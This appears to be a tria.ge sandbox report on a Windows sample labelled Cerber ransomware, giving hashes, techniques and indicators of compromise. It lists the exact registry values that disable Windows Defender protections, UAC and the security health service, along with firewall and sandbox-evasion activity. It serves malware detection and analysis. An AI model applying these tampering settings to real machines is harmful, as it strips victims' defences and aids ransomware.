Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10/11/2024, 15:44
Behavioral task
behavioral1
Sample
3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe
Resource
win10v2004-20241007-en
General
-
Target
3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe
-
Size
3.1MB
-
MD5
8b691a8961e3f204ebe13855f69649b7
-
SHA1
fec122cc8e46261629da8ac838018cfa98cb093c
-
SHA256
3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c
-
SHA512
25d4ab3a2ba7998f699e4ee3a70d6ad1f0d7497914172ca394556577b58567be0df7c793eea062071714a5ff4a48c6789081f46a3ca71bc39596941f7051d817
-
SSDEEP
49152:zulB+LF2pkwRBn6+SlLAzS45uEY2zmbJbRMn3Mnkir:WUZ4hkXlLsS5EJ5n3Mnkir
Malware Config
Signatures
-
Cerber
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
-
Cerber family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Detected Nirsoft tools 1 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/files/0x000a000000023b84-77.dat Nirsoft -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2896 powershell.exe 1164 powershell.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4132 netsh.exe 4692 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 25 IoCs
pid Process 3164 sg.tmp 3600 AMIDEWINx64.EXE 1800 AMIDEWINx64.EXE 4848 AMIDEWINx64.EXE 3140 AMIDEWINx64.EXE 1620 AMIDEWINx64.EXE 3964 ycyp.exe 5076 sg.tmp 4828 DevManView.exe 1172 DevManView.exe 3720 DevManView.exe 2356 DevManView.exe 1464 DevManView.exe 3260 DevManView.exe 4600 DevManView.exe 3600 DevManView.exe 4040 DevManView.exe 1072 DevManView.exe 3140 DevManView.exe 4960 DevManView.exe 952 DevManView.exe 4812 DevManView.exe 3960 DevManView.exe 3024 DevManView.exe 896 ycyp.exe -
Enumerates connected drives 3 TTPs 32 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe -
Maps connected drives based on registry 3 TTPs 62 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0" DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count DevManView.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0" DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Delete value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DevManView.exe -
Modifies Security services 2 TTPs 1 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe -
Power Settings 1 TTPs 2 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2880 powercfg.exe 4316 powercfg.exe -
resource yara_rule behavioral2/memory/2044-0-0x0000000000400000-0x0000000000783000-memory.dmp upx behavioral2/memory/2044-33-0x0000000000400000-0x0000000000783000-memory.dmp upx behavioral2/memory/3964-41-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral2/files/0x0031000000023b81-38.dat upx behavioral2/memory/3964-101-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral2/memory/3964-100-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral2/memory/3964-116-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral2/memory/896-118-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral2/memory/2640-137-0x0000000000400000-0x0000000000783000-memory.dmp upx behavioral2/memory/2044-135-0x0000000000400000-0x0000000000783000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\INF\setupapi.dev.log DevManView.exe File opened for modification C:\Windows\INF\setupapi.dev.log DevManView.exe File opened for modification C:\Windows\INF\setupapi.dev.log DevManView.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 3904 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ycyp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ycyp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Driver DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\ DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\ DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000064\00000000 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\ DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGUID DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ContainerID DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ClassGuid DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Mfg DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 DevManView.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2} DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\ DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Driver DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067\ DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM DevManView.exe -
Kills process with taskkill 6 IoCs
pid Process 3488 taskkill.exe 4952 taskkill.exe 1668 taskkill.exe 4860 taskkill.exe 3928 taskkill.exe 1884 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 1164 powershell.exe 2896 powershell.exe 2896 powershell.exe 1164 powershell.exe 1164 powershell.exe 2896 powershell.exe 4828 DevManView.exe 4828 DevManView.exe 1172 DevManView.exe 1172 DevManView.exe 3720 DevManView.exe 3720 DevManView.exe 2356 DevManView.exe 2356 DevManView.exe 1464 DevManView.exe 1464 DevManView.exe 3260 DevManView.exe 3260 DevManView.exe 4600 DevManView.exe 4600 DevManView.exe 3600 DevManView.exe 3600 DevManView.exe 4040 DevManView.exe 4040 DevManView.exe 1072 DevManView.exe 1072 DevManView.exe 3140 DevManView.exe 3140 DevManView.exe 4960 DevManView.exe 4960 DevManView.exe 952 DevManView.exe 952 DevManView.exe 4812 DevManView.exe 4812 DevManView.exe 3960 DevManView.exe 3960 DevManView.exe 3024 DevManView.exe 3024 DevManView.exe 3964 ycyp.exe 3964 ycyp.exe 3964 ycyp.exe 3964 ycyp.exe 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe 